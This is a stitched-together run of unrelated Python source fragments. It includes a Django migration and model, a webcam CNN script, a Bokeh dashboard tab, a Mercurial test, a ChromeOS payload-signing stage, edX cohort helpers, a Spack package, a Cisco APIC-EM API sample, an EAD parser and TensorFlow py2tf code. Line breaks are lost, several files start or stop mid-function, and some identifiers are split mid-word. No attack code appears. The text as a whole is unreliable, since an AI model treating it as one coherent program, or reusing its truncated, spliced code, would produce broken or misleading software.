# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-06-01 12:02 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('website', '0030_github_user'), ] operations = [ migrations.AddField( model_name='linkedin_user', name='number_all_repos', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos1', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos2', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user', name='number_repos3', field=models.IntegerField(default=0), ), migrations.AddField( model_name='linkedin_user',
name='technology1', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology2', field=models.CharField(default='', max_length=50), ), migrations.AddField( model_name='linkedin_user', name='technology3', field=models.CharField(default='', max_leng
th=50), ), ]
from django.db import models class BranchManager(models.Manager): def get_branch(self, user, project): try: return self.get(user=user, project=project, active=True)
except: return self.create(user=user, project=project, active=True) class Branch(models.Model): user = models.ForeignKey('auth.User') project = models.ForeignKey('projects.Project') active = models.BooleanField(default=True) pushed = models.BooleanField(default=False) title = models.TextField(default='') comment = models.TextField
(default='') objects = BranchManager() def __unicode__(self): return "Branch of %s by %s (%s)" % (self.project, self.user, self.pk)
from django.apps import AppConfig from django.utils.translation import ugettext_lazy as _ class NavConfig(AppCo
nfig): name = 'cms.nav' verbose_name = _('Na
vigation')
import sys import os import cv2 from keras.models import load_m
odel sys.path.append("/Users/alexpapiu/Documents/Conv/OpenCV_CNN") from webcam_cnn_pipeline import return_compiled_model_2, real_time_pred model_name = sys
.argv[1] w = 1.5*144 h = 2*144 #keep track of all labels: all_labels = {"model_hand":["A", "B", "C", "D", "No Hand"], "basic_model":["happy", "sad", "normal", "incredulous"], "model_face":["happy", "sad", "normal"]} labelz = dict(enumerate(all_labels[model_name])) os.chdir("/Users/alexpapiu/Documents/Data/OpenCV_CNN") model = return_compiled_model_2(input_shape = (3,int(h),int(w)), num_class = len(labelz)) model.load_weights(model_name) #open a new video: cp = cv2.VideoCapture(0) cp.set(3, w) cp.set(4, h) real_time_pred(model, labelz, cp = cp, nframes = 10000)
# pandas and numpy for data manipulation import pandas as pd import numpy as np import sqlite3 from bokeh.plotting import Figure from bokeh.models import ( CategoricalColorMapper, HoverTool, ColumnDataSource, Panel, FuncTickFormatter, SingleIntervalTicker, LinearAxis, ) from bokeh.models import Legend from bokeh.models.widgets import ( CheckboxGroup, Slider, RangeSlider, Tabs, CheckboxButtonGroup, TableColumn, DataTable, Select, ) from bokeh.layouts import column, row, WidgetBox import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt import matplotlib.colors as colors def perfmon_tab(db): def make_dataset(perfmon_list): newdf = perfmon[perfmon_list] # Convert dataframe to column data source return ColumnDataSource(newdf) def make_plot(src): # Blank plot with correct labels p = Figure( plot_width=1024, plot_height=768, x_axis_type="datetime", title="perfmon", output_backend="webgl", ) cm = plt.get_cmap("gist_rainbow") numlines = len(perfmon.columns) mypal = [cm(1.0 * i / numlines) for i in range(numlines)] mypal = list(map(lambda x: colors.rgb2hex(x), mypal)) col = 0 legenditems = [] for key in src.data.keys(): if key == "datetime": continue l = key + " " col = col
+ 1 cline = p.line( perfmon.index.values, perfmon[key], line_width=1, alpha=0.8,
color=mypal[col], ) legenditems += [(key, [cline])] p.legend.click_policy = "hide" legend = Legend(items=legenditems, location=(0, 0)) p.add_layout(legend, "below") return p def update(attr, old, new): perfmons_to_plot = [ perfmon_selection.labels[i] for i in perfmon_selection.active ] new_src = make_dataset(perfmons_to_plot) plot = make_plot(new_src) # TODO:crude hack in lack of a better solution so far layout.children[1] = plot # get data from DB, setup index cur = db.cursor() cur.execute( "SELECT name FROM sqlite_master WHERE type='table' AND name=?", ["perfmon"] ) if len(cur.fetchall()) == 0: return None perfmon = pd.read_sql_query("select * from perfmon", db) perfmon.index = pd.to_datetime(perfmon["datetime"]) perfmon = perfmon.drop(["datetime"], axis=1) perfmon.index.name = "datetime" perfmon_selection = CheckboxGroup( labels=list(perfmon.columns), active=[0, 5], width=300, height=800, sizing_mode="fixed", ) perfmon_list = [perfmon_selection.labels[i] for i in perfmon_selection.active] src = make_dataset(perfmon_list) plot = make_plot(src) perfmon_selection.on_change("active", update) controls = WidgetBox(perfmon_selection, width=300, height=800, sizing_mode="fixed") layout = row(controls, plot) tab = Panel(child=layout, title="perfmon") return tab
# Copyright (c) Meta Platforms, Inc. and affiliates. # Copyright (c) Mercurial Contributors. # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later v
ersion. from __future__ import absolute_import from testutil.dott import feature, sh, testtmp # noqa: F401 feature.require(["symlink"]) # https://bz.mercurial-scm.or
g/1438 sh % "hg init repo" sh % "cd repo" sh % "ln -s foo link" sh % "hg add link" sh % "hg ci -mbad link" sh % "hg rm link" sh % "hg ci -mok" sh % "hg diff -g -r '0:1'" > "bad.patch" sh % "hg up 0" == "1 files updated, 0 files merged, 0 files removed, 0 files unresolved" sh % "hg import --no-commit bad.patch" == "applying bad.patch" sh % "hg status" == r""" R link ? bad.patch"""
present. Args: builder_run: See builder_run on ArchivingStage. board: See board on ArchivingStage. archive_stage: See archive_stage on ArchivingStage. channels: Explicit list of channels to generate payloads for. If empty, will instead wait on values from push_image. Channels is normally None in release builds, and normally set for trybot 'payloads' builds. """ super(PaygenStage, self).__init__(builder_run, board, archive_stage, **kwargs) self.signing_results = {} self.channels = channels def _HandleStageException(self, exc_info): """Override and don't set status to FAIL but FORGIVEN instead.""" exc_type, exc_value, _exc_tb = exc_info # If Paygen fails to find anything needed in release.conf, treat it # as a warning, not a failure. This is common during new board bring up. if issubclass(exc_type, PaygenNoPaygenConfigForBoard): return self._HandleExceptionAsWarning(exc_info) # If the exception is a TestLabFailure that means we couldn't schedule the # test. We don't fail the build for that. We do the CompoundFailure dance, # because that's how we'll get failures from background processes returned # to us. if (issubclass(exc_type, failures_lib.TestLabFailure) or (issubclass(exc_type, failures_lib.CompoundFailure) and exc_value.MatchesFailureType(failures_lib.TestLabFailure))): return self._HandleExceptionAsWarning(exc_info) return super(PaygenStage, self)._HandleStageException(exc_info) def _JsonFromUrl(self, gs_ctx, url): """Fetch a GS Url, and parse it as Json. Args: gs_ctx: GS Context. url: Url to fetch and parse. Returns: None if the Url doesn't exist. Parsed Json structure if it did. Raises: MalformedResultsException if it failed to parse. """ try: signer_txt = gs_ctx.Cat(url).output except gs.GSNoSuchKey: return None try: return json.loads(signer_txt) except ValueError: # We should never see malformed Json, even for intermediate statuses. raise MalformedResultsException(signer_txt) def _SigningStatusFromJson(self, signer_json): """Extract a signing status from a signer result Json DOM. Args: signer_json: The parsed json status from a signer operation. Returns: string with a simple status: 'passed', 'failed', 'downloading', etc, or '' if the json doesn't contain a status. """ return (signer_json or {}).get('status', {}).get('status', '') def _CheckForResults(self, gs_ctx, instruction_urls_per_channel, channel_notifier): """timeout_util.WaitForSuccess func to check a list of signer results. Args: gs_ctx: Google Storage Context. instruction_urls_per_channel: Urls of the signer result files we're expecting. channel_notifier: BackgroundTaskRunner into which we push channels for processing. Returns: Number of results not yet collected. """ COMPLETED_STATUS = ('passed', 'failed') # Assume we are done, then try to prove otherwise. results_completed = True for channel in instruction_urls_per_channel.keys(): self.signing_results.setdefault(channel, {}) if (len(self.signing_results[channel]) == len(instruction_urls_per_channel[channel])): continue for url in instruction_urls_per_channel[channel]: # Convert from instructions URL to instructions result URL. url += '.json' # We already have a result for this URL. if url in self.signing_results[channel]: continue signer_json = self._JsonFromUrl(gs_ctx, url) if self._SigningStatusFromJson(signer_json) in COMPLETED_STATUS: # If we find a co
mpleted result, remember it. self.signing_results[channel][url] = signer_json # If we don't have full results for this channel, we aren't done # waiting. if (len(self.signing_results[channel]) != len(instruction_urls_per_channel[channel]))
: results_completed = False continue # If we reach here, the channel has just been completed for the first # time. # If all results 'passed' the channel was successfully signed. channel_success = True for signer_result in self.signing_results[channel].values(): if self._SigningStatusFromJson(signer_result) != 'passed': channel_success = False # If we successfully completed the channel, inform paygen. if channel_success: channel_notifier(channel) return results_completed def _WaitForPushImage(self): """Block until push_image data is ready. Returns: Push_image results, expected to be of the form: { 'channel': ['gs://instruction_uri1', 'gs://signer_instruction_uri2'] } Raises: MissingInstructionException: If push_image sent us an error, or timed out. """ try: instruction_urls_per_channel = self.board_runattrs.GetParallel( 'instruction_urls_per_channel', timeout=self.PUSHIMAGE_TIMEOUT) except cbuildbot_run.AttrTimeoutError: instruction_urls_per_channel = None # A value of None signals an error, either in PushImage, or a timeout. if instruction_urls_per_channel is None: raise MissingInstructionException('PushImage results not available.') return instruction_urls_per_channel def _WaitForSigningResults(self, instruction_urls_per_channel, channel_notifier): """Do the work of waiting for signer results and logging them. Args: instruction_urls_per_channel: push_image data (see _WaitForPushImage). channel_notifier: BackgroundTaskRunner into which we push channels for processing. Raises: ValueError: If the signer result isn't valid json. RunCommandError: If we are unable to download signer results. """ gs_ctx = gs.GSContext(dry_run=self._run.debug) try: cros_build_lib.Info('Waiting for signer results.') timeout_util.WaitForReturnTrue( self._CheckForResults, func_args=(gs_ctx, instruction_urls_per_channel, channel_notifier), timeout=self.SIGNING_TIMEOUT, period=self.SIGNING_PERIOD) except timeout_util.TimeoutError: msg = 'Image signing timed out.' cros_build_lib.Error(msg) cros_build_lib.PrintBuildbotStepText(msg) raise SignerResultsTimeout(msg) # Log all signer results, then handle any signing failures. failures = [] for url_results in self.signing_results.values(): for url, signer_result in url_results.iteritems(): result_description = os.path.basename(url) cros_build_lib.PrintBuildbotStepText(result_description) cros_build_lib.Info('Received results for: %s', result_description) cros_build_lib.Info(json.dumps(signer_result, indent=4)) status = self._SigningStatusFromJson(signer_result) if status != 'passed': failures.append(result_description) cros_build_lib.Error('Signing failed for: %s', result_description) if failures: cros_build_lib.Error('Failure summary:') for failure in failures: cros_build_lib.Error(' %s', failure) raise SignerFailure(failures) def PerformStage(self): """Do the work of generating our release payloads.""" # Convert to release tools naming for boards. board = self._current_board.replace('_', '-') version = self._run.attrs.release_tag assert version, "We can't generate payloads without a release_tag." logging.info("Generating payloads for: %s, %s", board, version) # Test to see if the current board has a Paygen configuration. We do # this here, no in the sub-process so we don't have to pass back a # failure reason. try: from crostools.lib import paygen_build_lib paygen_build_lib.ValidateBoardConfig(board) except
tings. Raises: Http404 if the course doesn't exist. """ return _get_course_cohort_settings(course_key).id def set_course_cohorted(course_key, cohorted): """ Given a course course and a boolean, sets whether or not the course is cohorted. Raises: Value error if `cohorted` is not a boolean """ if not isinstance(cohorted, bool): raise ValueError("Cohorted must be a boolean") course_cohort_settings = _get_course_cohort_settings(course_key) course_cohort_settings.is_cohorted = cohorted course_cohort_settings.save() def get_cohort_id(user, course_key, use_cached=False): """ Given a course key and a user, return the id of the cohort that user is assigned to in that course. If they don't have a cohort, return None. """ cohort = get_cohort(user, course_key, use_cached=use_cached) return None if cohort is None else cohort.id COHORT_CACHE_NAMESPACE = u"cohorts.get_cohort" def _cohort_cache_key(user_id, course_key): """ Returns the cache key for the given user_id and course_key. """ return u"{}.{}".format(user_id, course_key) def bulk_cache_cohorts(course_key, users): """ Pre-fetches and caches the cohort assignments for the given users, for later fast retrieval by get_cohort. """ # before populating the cache with another bulk set of data, # remove previously cached entries to keep memory usage low. request_cache.clear_cache(COHORT_CACHE_NAMESPACE) cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE) if is_course_cohorted(course_key): cohorts_by_user = { membership.user: membership for membership in CohortMembership.objects.filter(user__in=users, course_id=course_key).select_related('user__id') } for user, membership in cohorts_by_user.iteritems(): cache[_cohort_cache_key(user.id, course_key)] = membership.course_user_group uncohorted_users = filter(lambda u: u not in cohorts_by_user, users) else: uncohorted_users = users for user in uncohorted_users: cache[_cohort_cache_key(user.id, course_key)] = None def get_cohort(user, course_key, assign=True, use_cached=False): """ Returns the user's cohort for the specified course. The cohort for the user is cached for the duration of a request. Pass use_cached=True to use the cached value instead of fetching from the database. Arguments: user: a Django User object. course_key: CourseKey assign (bool): if False then we don't assign a group to user use_cached (bool): Whether to use the cached value or fetch from database. Returns: A CourseUserGroup object if the course is cohorted and the User has a cohort, else None. Raises: ValueError if the CourseKey doesn't exist. """ cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE) cache_key = _cohort_cache_key(user.id, course_key) if use_cached and cache_key in cache: return cache[cache_key] cache.pop(cache_key, None) # First check whether the course is cohorted (users shouldn't be in a cohort # in non-cohorted courses, but settings can change after course starts) if not is_course_cohorted(course_key): return cache.setdefault(cache_key, None) # If course is cohorted, check if the user already has a cohort. try: membership = CohortMembership.objects.get( course_id=course_key, user_id=user.id, ) return cache.setdefault(cache_key, membership.course_user_group) except CohortMembership.DoesNotExist: # Didn't find the group. If we do not want to assign, return here. if not assign: # Do not cache the cohort here, because in the next call assign # may be True, and we will have to assign the user a cohort. return None # Otherwise assign the user a cohort. try: with transaction.atomic(): # If learner has been pre-registered in a cohort, get that cohort. Otherwise assign to a random cohort. course_user_group = None for assignment in UnregisteredLearnerCohortAssignments.objects.filter(email=user.email, course_id=course_key): course_user_group = assignment.course_user_group unregistered_learner = assignment if course_user_group: unregistered_learner.delete() else: course_user_group = get_random_cohort(course_key) membership = CohortMembership.objects.create( user=user, course_user_group=course_user_group, ) return cache.setdefault(cache_key, membership.course_user_group) except IntegrityError as integrity_error: # An IntegrityError is raised when multiple workers attempt to # create the same row in one of the cohort model entries: # CourseCohort, CohortMembership. log.info( "HANDLING_INTEGRITY_ERROR: IntegrityError encountered for course '%s' and user '%s': %s", course_key, user.id, unicode(integrity_error) ) return get_cohort(user, course_key, assign, use_cached) def get_random_cohort(course_key): """ Helper method to get a cohort for random assignment. If there are multiple cohorts of type RANDOM in the course, one of them will be randomly selected. If there are no existing cohorts of type RANDOM in the course, one will be created. """ course = courses.get_course(course_key) cohorts = get_course_cohorts(course, assignment_type=CourseCohort.RANDOM) if cohorts: cohort = local_random().choice(cohorts) else: cohort = CourseCohort.create( cohort_name=DEFAULT_COHORT_NAME, course_id=course_key, assignment_type=CourseCohort.RANDOM ).course_user_group return cohort def migrate_cohort_settings(course): """ Migrate all the cohort settings associated with this course from modulestore to mysql. After that we will never touch modulestore for any cohort related settings. """ cohort_settings, created = CourseCohortsSettings.objects.get_or_create( course_id=course.id, defaults=_get_cohort_settings_from_modulestore(course) ) # Add the new and update the existing cohorts if created: # Update the manual cohorts already present in CourseUserGroup manual_cohorts = CourseUserGroup.objects.filter( course_id=course.id, group_type=CourseUserGroup.COHORT ).exclude(name__in=course.auto_cohort_groups) for cohort in manual_cohorts: CourseCohort.create(course_user_group=cohort) for group_name in course.auto_cohort_groups: CourseCohort.create(cohort_name=group_name, course_id=course.id, assignment_type=CourseCohort.RANDOM) return cohort_settings def get_course_cohorts(course, assignment_type=None): """ Get a list of all the cohorts in the given course. This will include auto cohorts, regardless of whether or not the auto cohorts include any users. Argument
s: course: the course for which cohorts should be returned assignment_type: cohort assignment type Returns: A list of CourseUserGroup objects. Empty if there are no cohorts. Does not check whether the course is cohorted. """ # Migrate cohort settings for this course migrate_cohort_settings(course)
query_set = CourseUserGroup.objects.filter( course_id=course.location.course_key, group_type=CourseUserGroup.COHORT ) query_set = query_set.filter(cohort__assignment_type=assignment_type) if assignment_type else query_set return list(query_set) def get_cohort_names(course): """Return a dict that maps cohort ids to names for the given course""" return {cohort.id: cohort.name for cohort in get_course_cohorts(course)} ### Helpers for cohort management views def get_cohort_by_name(course_key, name):
# Copyright 2013-2020 Lawrence Livermore National Security, LLC a
nd other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class ExuberantCtags(AutotoolsPackage): """The canonical ctags generator""" homepage = "http://c
tags.sourceforge.net" url = "http://downloads.sourceforge.net/project/ctags/ctags/5.8/ctags-5.8.tar.gz" version('5.8', sha256='0e44b45dcabe969e0bbbb11e30c246f81abe5d32012db37395eb57d66e9e99c7')
# Getting started with APIC-EM APIs # Follows APIC-EM Basics Learning Lab # Basics Learning Lab Full example for Get Devices, Get Hosts, Get Policies, Get Applications # * THIS SAMPLE APPLICATION AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY # * OF ANY KIND BY CISCO, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED # * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR # * PURPOSE, NONINFRINGEMENT, SATISFACTORY QUALITY OR ARISING FROM A COURSE OF # * DEALING, LAW, USAGE, OR TRADE PRACTICE. CISCO TAKES NO RESPONSIBILITY # * REGARDING ITS USAGE IN AN APPLICATION, AND IT IS PRESENTED ONLY AS AN # * EXAMPLE. THE SAMPLE CODE HAS NOT BEEN THOROUGHLY TESTED AND IS PROVIDED AS AN # * EXAMPLE ONLY, THEREFORE CISCO DOES NOT GUARANTEE OR MAKE ANY REPRESENTATIONS # * REGARDING ITS RELIABILITY, SERVICEABILITY, OR FUNCTION. IN NO EVENT DOES # * CISCO WARRANT THAT THE SOFTWARE IS ERROR FREE OR THAT CUSTOMER WILL BE ABLE # * TO OPERATE THE SOFTWARE WITHOUT PROBLEMS OR INTERRUPTIONS. NOR DOES CISCO # * WARRANT THAT THE SOFTWARE OR ANY EQUIPMENT ON WHICH THE SOFTWARE IS USED WILL # * BE FREE OF VULNERABILITY TO INTRUSION OR ATTACK. THIS SAMPLE APPLICATION IS # * NOT SUPPORTED BY CISCO IN ANY MANNER. CISCO DOES NOT ASSUME ANY LIABILITY # * ARISING FROM THE USE OF THE APPLICATION. FURTHERMORE, IN NO EVENT SHALL CISCO # * OR ITS SUPPLIERS BE LIABLE FOR ANY INCIDENTAL OR CONSEQUENTIAL DAMAGES, LOST # * PROFITS, OR LOST DATA, OR ANY OTHER INDIRECT DAMAGES EVEN IF CISCO OR ITS # * SUPPLIERS HAVE BEEN INFORMED OF THE POSSIBILITY THEREOF.--> # import the requests library so we can use it to make REST calls (http://docs.python-requests.org/en/latest/index.html) import requests # import the json library. This library provides handy features for formatting, displaying # and manipulating json. import json # All of our REST calls will use the url for the APIC EM Controller as the base URL # So lets define a variable for the controller IP or DNS so we don't have to keep typing it controller_url = "http://sandboxapic.cisco.com/" # Get Devices # This function allows you to view a list of all the devices in the network(routers and switches). get_devices_url = controller_url + 'api/v0/network-device' #Perform GET on get_devices_url and load response into a json object get_devices_response = requests.get(get_devices_url) get_devices_json = get_devices_response.json() #Now let's read and display some specific information from the json # set our parent as the top level response object parent = get_devices_json["response"] print ("Devices = ") # for each device returned, print the networkDeviceId for item in parent: print (item["id"]) # Get Hosts # This function allows you to view a list of all the hosts in the network. get_hosts_url = controller_url + 'api/v0/host' #Perform GET on get_hosts_url and load response into a json object get_hosts_response = requests.get(get_hosts_url) get_hosts_json = get_hosts_response.json() #Now let's read and display some specific information from the json # set our parent as the top level response object hosts_parent = get_hosts_json["response"] print ("Hosts= ") # for eac
h device returned, print the networkDeviceId for item in hosts_parent: print (item["hostIp"]) # Get Policies # This function allows you to view a list of all the policies in the network. get_policies_url = controller_url + 'api/v0/policy' #Perform GET on get_hosts_url and load response into a json object get_policies_response = requests.get(get_policie
s_url) get_policies_json = get_policies_response.json() #Now let's read and display some specific information from the json # set our parent as the top level response object policies_parent = get_policies_json["response"] print ("Policies= ") # for each device returned, print the networkDeviceId for item in policies_parent: print (item["id"]) # Get Applications # This function allows you to view a list of all the applications in the network. get_apps_url = controller_url + 'api/v0/application' #Perform GET on get_hosts_url and load response into a json object get_apps_response = requests.get(get_apps_url) get_apps_json = get_apps_response.json() #Now let's read and display some specific information from the json # set our parent as the top level response object apps_parent = get_apps_json["response"] print ("Applications= ") # for each device returned, print the networkDeviceId for item in apps_parent: print (item["name"])
#!/usr/bin/env python import click import logging import os import pagoda import pagoda.viewer def full(name): return os.path.join(os.path.dirname(__file__), name) @click.command() def main(): logging.basicConfig() w = pagoda.cooper.World(dt=1. / 120) w.load_skeleton(full('../optimized-skeleton.txt')) w.load_markers(full('cooper-motion.c
3d'),
full('../optimized-markers.txt')) pagoda.viewer.Viewer(w).run() if __name__ == '__main__': main()
# module for the Container List <dsc> import xml.etree.cElementTree as ET from components import components import globals import wx from messages import error from mixed_content import mixed_content def dsc(dsc_root, FASheet, version): from wx.lib.pubsub import pub wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading <dsc>...") if dsc_root.find('c/c') is None: if dsc_root.find('c01/c02') is None: number = "noseries" else: number = "c01" else: number = "c" """ for top_series in dsc_root: if top_series.find('did/unittitle') is None: wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading series...") else: wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading " + top_series.find('did/unittitle').text + "...") """ if number == "c": child_tag = "c" cmpnt_count = 0 if dsc_root.iterfind('c/c') is None: #Collection does not have series FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries" cmpnt_count = cmpnt_count + 1 level = "1" components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version) else: #Collection has series FASheet.find('CollectionSheet/CollectionMap').clear() for component in dsc_root.iter('c'): if component.find('c') is None: pass else: cmpnt_count = cmpnt_count + 1 Component_element = ET.Element('Component') FASheet.find('CollectionSheet/CollectionMap').append(Component_element) ComponentLevel_element = ET.Element('ComponentLevel') Component_element.append(ComponentLevel_element) ComponentNumber_element = ET.Element('ComponentNumber') Component_element.append(ComponentNumber_element) ComponentName_element = ET.Element('ComponentName') Component_element.append(ComponentName_element) if component in dsc_root.iterfind('c'): level = "1" elif component in dsc_root.iterfind('c/c'): level = "2" elif component in dsc_root.iterfind('c/c/c'): level = "3" elif component in dsc_root.iterfind('c/c/c'): level = "4" elif component in dsc_root.iterfind('c/c/c/c'): level = "5" elif component in dsc_root.iterfind('c/c/c/c/c'): level = "6" elif component in dsc_root.iterfind('c/c/c/c/c/c'): level = "7" elif component in dsc_root.iterfind('c/c/c/c/c/c/c'): level = "8" elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c'): level = "9" elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c'): level = "10" elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c'): level = "11" elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c/c'): level = "12" ComponentLevel_element.text = level if component.find('did') is None: pass else: if component.find('did/unitid') is None: if "id" in component.attrib: ComponentNumber_element.text = component.attrib['id'] elif "id" in component.find('did').attrib: ComponentNumber_element.text = component.find('did').attrib['id'] else: ComponentNumber_element.text = mixed_content(component.find('did/unitid')) if component.find('did/unittitle') is None: pass else: ComponentName_element.text = mixed_content(component.find('did/unittitle')) if cmpnt_count > 51: pass elif cmpnt_count == 51: error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False) else: components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version) elif number == "c01": cmpnt_count = 0 if dsc_root.iter('c02') is None: #Collection does not have series FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries" cmpnt_count = cmpnt_count + 1 level = "1" components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version) else: #Collection has series FASheet.find('CollectionSheet/CollectionMap').clear() for component in dsc_root.iter(): if component.tag == 'c01' or component.tag == 'c02' or component.tag == 'c03' or component.tag == 'c04' or component.tag == 'c05' or component.tag == 'c06' or component.tag == 'c07' or component.tag == 'c08' or compone
nt.tag == 'c09' o
r component.tag == 'c10' or component.tag == 'c11' or component.tag == 'c12': child_tag_name = component.tag[1:] if int(child_tag_name) < 10: child_tag = "c0" + str(int(child_tag_name) + 1) else: child_tag = "c" + str(int(child_tag_name) + 1) if component.find(child_tag) is None: pass else: cmpnt_count = cmpnt_count + 1 Component_element = ET.Element('Component') FASheet.find('CollectionSheet/CollectionMap').append(Component_element) ComponentLevel_element = ET.Element('ComponentLevel') Component_element.append(ComponentLevel_element) ComponentNumber_element = ET.Element('ComponentNumber') Component_element.append(ComponentNumber_element) ComponentName_element = ET.Element('ComponentName') Component_element.append(ComponentName_element) level = "0" if component.tag == 'c01': level = "1" elif component.tag == 'c02': level = "2" elif component.tag == 'c03': level = "3" elif component.tag == 'c04': level = "4" elif component.tag == 'c05': level = "5" elif component.tag == 'c06': level = "6" elif component.tag == 'c07': level = "7" elif component.tag == 'c08': level = "8" elif component.tag == 'c09': level = "9" elif component.tag == 'c10': level = "10" elif component.tag == 'c11': level = "11" elif component.tag == 'c12': level = "12" ComponentLevel_element.text = level if component.find('did') is None: pass else: if component.find('did/unitid') is None: if "id" in component.attrib: ComponentNumber_element.text = component.attrib['id'] elif "id" in component.find('did').attrib: ComponentNumber_element.text = component.find('did').attrib['id'] else: ComponentNumber_element.text = mixed_content(component.find('did/unitid')) if component.find('did/unittitle') is None: pass else: ComponentName_element.text = mixed_content(component.find('did/unittitle')) if cmpnt_count > 51: pass elif cmpnt_count == 51: error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False) else: components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version) elif number == "noseries": cmpnt_count = 0 #Collection does not have series FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries" cmpnt_count = 1 level = "1" components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, "c", version)
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # This file is part of overview archive. # Copyright © 2015 seamus tuohy, <stuohy@internews.org> # # This program is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the Free # Software Foundation, either version 3 of the License, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # FITNESS FO
R A PARTIC
ULAR PURPOSE. See the included LICENSE file for details. # identification from os import path from os.path import abspath from urllib.parse import urlparse from urllib.request import urlopen import magic from urllib.error import HTTPError # logging import logging log = logging.getLogger("oa.{0}".format(__name__)) def filetype(file_path): if path.exists(file_path) and path.isfile(file_path): try: file_type = magic.from_file(abspath(file_path), mime=True) except IOError: log.error("{0} is not a valid file".format(file_path)) raise IOError("{0} is not a valid file".format(file_path)) else: log.error("{0} is not a valid path to a file".format(file_path)) raise IOError("{0} is not a valid path to a file".format(file_path)) log.debug("filetype for {0} identified as {1}".format(file_path, file_type)) return file_type def is_url(link): try: site = urlopen(link) return True except (ValueError, HTTPError): return False return False def is_archive(link): try: parsed_url = urlparse(link) if parsed_url.netloc == 'web.archive.org': return True except ValueError: return False return False
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Live value resolution. Live values are extracted from the known execution context. Requires activity analysis annotations. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import gast from tensorflow.contrib.py2tf.pyct import anno from tensorflow.contrib.py2tf.pyct import transformer from tensorflow.contrib.py2tf.pyct.static_analysis.annos import NodeAnno class LiveValueResolver(transformer.Base): """Annotates nodes with live values.""" def __init__(self, context, literals): super(LiveValueResolver, self).__init__(context) self.literals = literals def visit_ClassDef(self, node): self.generic_visit(node) anno.setanno(node, 'live_val', self.context.namespace[node.name]) return node def visit_Name(self, node): self.generic_visit(node) if isinstance(node.ctx, gast.Load): assert anno.hasanno(node, NodeAnno.IS_LOCAL), node symbol_is_local = anno.getanno(node, NodeAnno.IS_LOCAL) assert anno.hasanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY), node symbol_is_modified = anno.getanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY) assert anno.hasanno(node, NodeAnno.IS_PARAM), node symbol_is_param = anno.getanno(node, NodeAnno.IS_PARAM) if not symbol_is_local and not symbol_is_param: if node.id in self.literals: anno.setanno(node, 'live_val', self.literals[node.id]) elif node.id in self.context.namespace: obj = self.context.namespace[node.id] anno.setanno(node, 'live_val', obj) if hasattr(obj, '__name__'): # If the symbol value is for example a primitive, then it will not # have a name. anno.setanno(node, 'fqn', (obj.__name__,)) else: pass # TODO(mdan): Should we raise an error here? # Can encounter this when: # * a symbol truly lacks reference # * a symbol is new, like the new name of a function we just renamed. else: pass # TODO(mdan): Attempt to trace its value through the local chain. # TODO(mdan): Use type annotations as fallback. if not symbol_is_modified: if node.id in self.context.arg_values: obj = self.context.arg_values[node.id] anno.setanno(node, 'live_val', obj) anno.setanno(node, 'fqn', (obj.__class__.__name__,)) return node def visit_Attribute(self, node): self.generic_visit(node) if anno.hasanno(node.value, 'live_val'): assert anno.hasanno(node.value, 'fqn') parent_object = anno.getanno(node.value, 'live_val') if not ha
sattr(parent_object, node.attr): raise AttributeError('%s has no attribute %s' % (parent_object, node.attr)) anno.setanno(node, 'parent_type', type(parent_object)) anno.setanno(node, 'live_val', getattr(parent_object, node.attr)) anno.setanno(node, 'fqn', anno.getanno(node.value, 'fqn') + (node.attr,)) # TODO(mdan): Investi
